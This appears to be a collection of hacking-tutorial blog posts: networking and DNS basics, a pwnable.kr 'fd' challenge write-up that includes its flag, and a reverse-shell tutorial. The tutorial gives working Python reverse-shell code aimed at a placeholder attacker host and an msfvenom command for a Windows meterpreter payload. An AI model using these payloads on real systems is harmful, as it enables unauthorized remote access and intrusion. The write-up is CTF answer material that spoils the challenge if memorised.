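To see the "32 bits, four octets" idea in action, here is a short sketch using Python's standard ipaddress module on the example address above.

```python
import ipaddress

addr = ipaddress.IPv4Address("10.10.17.28")

# The dotted form is just a friendly way of writing one 32-bit number.
as_int = int(addr)
print(as_int)       # 168431900
print(hex(as_int))  # 0xa0a111c

# Each octet is one byte of that number, most significant first.
octets = list(addr.packed)
print(octets)       # [10, 10, 17, 28]
```

Reading the hex value two digits at a time (0a, 0a, 11, 1c) gives back the four octets 10, 10, 17 and 28.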

The miracle of DNS is this: there are millions of servers all around the world hosting websites and other services. Imagine if we had to remember IP addresses in order to access websites. Our brains would eventually give up on retaining that much information, or at the very least it would be a major inconvenience. Instead, DNS, the Domain Name System, was created. It's essentially a protocol in the TCP/IP suite that resolves domain names to IP addresses. Consider the following:


kaizen@kaizen-box:~# host kaizensec.blogspot.com
kaizensec.blogspot.com is an alias for blogspot.l.googleusercontent.com.
blogspot.l.googleusercontent.com has address 216.58.223.129
blogspot.l.googleusercontent.com has IPv6 address 2c0f:fb50:4002:800::2001


The host utility on my local machine allows users/sysadmins/hackers to look up the IPv4 and IPv6 addresses of various domains. This blog has the domain name 'kaizensec.blogspot.com', and at the time of the lookup it resolved to the IP address 216.58.223.129. A domain name lets us humans remember sites so we can access them later, rather than remembering IP addresses. DNS servers are the servers responsible for resolving these domain names to their respective IP addresses.
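Programs do the same lookup through the operating system's resolver. Below is a minimal sketch built on socket.getaddrinfo from the standard library. The resolve function and its lookup parameter are my own additions: the parameter exists only so the example can run offline with a stand-in that returns the addresses from the host output above. Call resolve(name) with no second argument to perform a real lookup, which may return different addresses today.

```python
import socket

def resolve(hostname, lookup=socket.getaddrinfo):
    """Return the unique IP addresses a hostname resolves to."""
    addresses = []
    for _family, _type, _proto, _canon, sockaddr in lookup(hostname, None):
        ip = sockaddr[0]  # first element of the socket address is the IP string
        if ip not in addresses:
            addresses.append(ip)
    return addresses

def fake_lookup(hostname, port):
    """Offline stand-in that mimics getaddrinfo's return shape."""
    return [
        (socket.AF_INET, socket.SOCK_STREAM, 6, "", ("216.58.223.129", 0)),
        (socket.AF_INET6, socket.SOCK_STREAM, 6, "", ("2c0f:fb50:4002:800::2001", 0, 0, 0)),
    ]

resolved = resolve("kaizensec.blogspot.com", lookup=fake_lookup)
print(resolved)
```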

This is a brief intro to HTTP, how websites work, what servers are and how they work, as well as how DNS makes the whole process much easier than it could have been. Consider this a crash course on how HTTP and the internet work, in a nutshell. As you've probably noticed, if you wish to be proficient in hacking or even thrive in the IT industry, this knowledge is a prerequisite because almost everything runs through networking. The upside is that you use networking on a daily basis, so at least you've got some points under your belt (unless you're from a parallel universe where we're still in the stone ages... if that's the case then I don't know what to tell you). At least now you have a higher-level view of how the internet works. Note that there are more detailed technicalities to how all of this plays out, but this is enough to build a base for more advanced topics. I probably missed a couple of things, but for the most part, this covers enough for the absolute beginner to grab hold of and understand at a fundamental level.

Monday, April 25, 2022

fd - pwnable.kr (file descriptors & read() function) | pwn



CHALLENGE DESCRIPTION:

Mommy! what is a file descriptor in Linux?

* try to play the wargame your self but if you are ABSOLUTE beginner, follow this tutorial link:
https://youtu.be/971eZhMHQQw

ssh fd@pwnable.kr -p2222 (pw:guest)

This is my writeup for an easy pwn challenge that has to do with file descriptors and the read() function. Using the SSH creds given, we log onto the server and list the files in the current directory. We see an executable file, the source code for the executable, and the flag, which is owned by root, so we can't cheat by reading it directly. The challenge needs to be completed to read the flag. Let's see the files provided to complete the challenge. Play the wargame here.

fd@pwnable:~$ ls
fd  fd.c  flag

Let's see more about the fd executable file....

fd@pwnable:~$ file fd
fd: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2,
for GNU/Linux 2.6.24 BuildID[sha1]=c5ecc1690866b3bb085d59e87aad26a1e386aaeb, not stripped

It turns out the challenge is a 32-bit ELF file. It is dynamically linked, meaning it relies on shared libraries such as libc at run time for standard C functions like printf() and system(), and it's not stripped, which makes it easier to reverse engineer if it ever comes to that. Let's open the fd.c file to see how the program is written and analyze the code.

fd@pwnable:~$ cat fd.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char buf[32];
int main(int argc, char* argv[], char* envp[]){
        if(argc < 2){
                printf("pass argv[1] a number\n");
                return 0;
        }
        int fd = atoi( argv[1] ) - 0x1234;
        int len = 0;
        len = read(fd, buf, 32);
        if(!strcmp("LETMEWIN\n", buf)){
                printf("good job :)\n");
                system("/bin/cat flag");
                exit(0);
        }
        printf("learn about Linux file IO\n");
        return 0;

}

The goal is for system("/bin/cat flag") to be executed to complete the challenge. To see how we can achieve this, we have to analyze the code that comes before it. The source reveals a main() function which first checks whether at least one command line argument was given (argc < 2). If not, it prints "pass argv[1] a number" and exits. Otherwise, it passes the first argument to the atoi() function, which converts a numeric string to an integer, and subtracts 0x1234 from the result to get fd. The next line initializes the 'len' variable to zero, and the line after that calls the read() function. Looking into the manpages, we see the description of the read() function:

"The read() function shall attempt to read nbyte bytes from the file associated with the open file descriptor, 
fildes, into the buffer pointed to by buf"

Linux File descriptors are as follows:

0: stdin
1: stdout
2: stderr

This indicates that if we can get fd = 0, the program will take input from stdin, and we can then type 'LETMEWIN' followed by Enter, since there is a strcmp() call which compares the input placed in buf with the string "LETMEWIN\n". The fd variable takes our command line argument and subtracts 0x1234 from it, which is 4660 in decimal. To exploit this, we simply execute the fd binary with 4660 as the command line argument and then input the 'LETMEWIN' string so that the strcmp() check passes (strcmp() returns 0 when the two strings match, so !strcmp(...) evaluates to true). The system() function then executes "/bin/cat flag" and the flag is captured.
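The arithmetic and the read() behaviour can be tried out safely in Python. This is a sketch, not the challenge binary: fd_from_arg is a hypothetical stand-in for the atoi(argv[1]) - 0x1234 line (Python's int() is stricter than atoi() about junk characters), and a pipe is used in place of stdin so the example runs without typing anything.

```python
import os

def fd_from_arg(arg):
    """Mirror `atoi(argv[1]) - 0x1234` from fd.c for plain numeric input."""
    return int(arg) - 0x1234

print(0x1234)               # 4660
print(fd_from_arg("4660"))  # 0, which is stdin

# read(fd, buf, 32) simply pulls up to 32 bytes from whatever the descriptor points at.
# A pipe stands in for stdin here.
read_end, write_end = os.pipe()
os.write(write_end, b"LETMEWIN\n")
os.close(write_end)

buf = os.read(read_end, 32)
os.close(read_end)

# Same comparison the C code makes with strcmp("LETMEWIN\n", buf).
print(buf == b"LETMEWIN\n")  # True
```

Note that the newline matters: pressing Enter after typing LETMEWIN is what puts the "\n" into the buffer, and the program compares against "LETMEWIN\n".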

fd@pwnable:~$ ./fd 4660
LETMEWIN
good job :)
mommy! I think I know what a file descriptor is!!

Challenge completed! 

Flag: mommy! I think I know what a file descriptor is!!

Friday, April 15, 2022

Reverse Shells

Most Linux administrators, and attackers too, know how to navigate the command line on both Windows and Linux systems. To move around file systems and look around a computer without the graphical user interface we are used to, we make use of what we call a terminal. Hackers who are proficient with Linux mostly use the terminal to complete the more complicated tasks that the graphical user interface simply can't handle. When an attacker has enumerated and investigated the target system within the target network and finally needs unauthorized remote access, a reverse shell is typically what is used. A reverse shell, in the form covered here a TCP reverse shell, is a program that opens a command shell such as sh or bash on a compromised system and then connects back to an attacker-specified system, giving the attacker remote access to that command shell.

Typically, networks have firewalls in place to block incoming connections from outside the network. For a normal shell session, the machine controlled by the attacker would have to connect directly to the victim machine inside the target network. The chance of this succeeding is very slim, and the attacker is well aware of it. An attacker also has to make sure that gaining unauthorized access is as stealthy as possible. Modern networks have firewalls that reject incoming traffic and Intrusion Detection Systems (IDS) that pick up on malicious activity, so a direct inbound connection attempt is likely to be blocked or detected. Instead, an attacker will investigate the target and find another way in, either via phishing or vulnerability exploitation. For example, an attacker may try to exploit a command injection vulnerability on a server. The injected code will often be a reverse shell script that provides a convenient command shell for further malicious activity. The reverse shell makes the target system connect out to the attacker's machine and establish the shell over that outbound connection, which a firewall that only filters inbound traffic will usually allow.

Below is an example of reverse shell code written in Python. It is written this way because, when exploiting a vulnerability like command injection, this is the kind of code that would be injected for the target system to execute. Running it starts the reverse shell, so the target server connects to the attacker-controlled machine and gives the attacker remote access. I would like to explain the vital parts of the code below for the beginners or the curious.

user@kaizen:~$ cat revshell.py

import socket
import subprocess
import os

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("ATTACKER_IP",ATTACKER_PORT))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

socket.socket(socket.AF_INET, socket.SOCK_STREAM) - If you're familiar with Python programming, you'll know that Python has a socket module in its standard library, which provides the functions and methods for socket programming. This line calls the socket() constructor from that module. The arguments in the parentheses are AF_INET, which selects the IPv4 address family, and SOCK_STREAM, which is the socket type for TCP, the transport protocol used to carry the data across the network.

s.connect(("ATTACKER_IP",ATTACKER_PORT)) - this calls the connect() method of the socket object. This is where the attacker specifies the IP address and port of the machine they control, where a listener is waiting for the connection.

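p=subprocess.call(["/bin/sh","-i"]) - The subprocess module in Python is used to create new processes. This call starts /bin/sh, the path to the system shell, with -i to make it interactive. The shell runs on the target machine, not the attacker's. Because the three os.dup2() calls have already pointed file descriptors 0, 1 and 2 (stdin, stdout and stderr) at the socket, the shell's input and output travel over the connection, which is what gives the attacker remote shell access.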
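To see the socket(), connect() and os.dup2() pieces in isolation, here is a harmless loopback sketch that never leaves 127.0.0.1 and never starts a shell. It points file descriptor 1 at a local TCP socket, writes a message to "stdout", and reads it back on the other end. The function name stdout_over_loopback is made up for this example, and it assumes a Linux-like system where a socket's fileno() is an ordinary file descriptor.

```python
import os
import socket


def stdout_over_loopback(message: bytes) -> bytes:
    """Write `message` to fd 1 after pointing fd 1 at a local TCP socket."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as listener:
        listener.bind(("127.0.0.1", 0))  # port 0: let the OS pick a free port
        listener.listen(1)

        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as client:
            client.connect(listener.getsockname())
            conn, _peer = listener.accept()
            with conn:
                saved_stdout = os.dup(1)  # remember where stdout really goes
                try:
                    os.dup2(client.fileno(), 1)  # fd 1 now refers to the socket
                    os.write(1, message)         # "printing" sends bytes over TCP
                finally:
                    os.dup2(saved_stdout, 1)     # put the real stdout back
                    os.close(saved_stdout)
                return conn.recv(len(message))


if __name__ == "__main__":
    print(stdout_over_loopback(b"hello over fd 1\n"))
```

Any process started while the descriptors are redirected inherits them, which is why the shell in the listing above ends up talking to the socket instead of a terminal.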

Another way to create a reverse shell is to craft the payload as an executable binary, like an .exe file for Windows. A common way to do this is with the Metasploit Framework.

Msfvenom is the command-line payload generator that ships with the Metasploit Framework. It is used to generate and output the various types of payloads and shellcode that are available in Metasploit.

~$ msfvenom -p windows/meterpreter/reverse_tcp LHOST="ATTACKER_IP" LPORT="ATTACKER_PORT" -f exe -o revshell.exe

Flags: 

LHOST = (IP of Attacker Machine) 

LPORT = (PORT for the Attacker Machine) 

-p = (Payload e.g. Windows, Android, PHP etc.) 

-f = output format (e.g. exe for a Windows executable) 

-o = “out file” to write to, which in this case is in the current working directory.

Once this executable file is dropped onto a remote target and executed, it connects back to the attacker's listener on LHOST and LPORT, initiating the reverse shell and giving the attacker remote access.

Rounding Up

There are many other payloads and methods of initializing reverse shells for unauthorized remote access. This just gives a basic rundown of how to do them in the simplest ways I know. Of course, to be a successful hacker, intensive research is required within the domain of IT. This will give you more creative approaches to creating and dropping reverse shells, or even getting your target to execute them, so you can have remote access. Note that these methods (along with the others you will be researching, because hacking is all about research) are also applicable to CTF challenges. Got more hacking tutorials coming up. Stay tuned.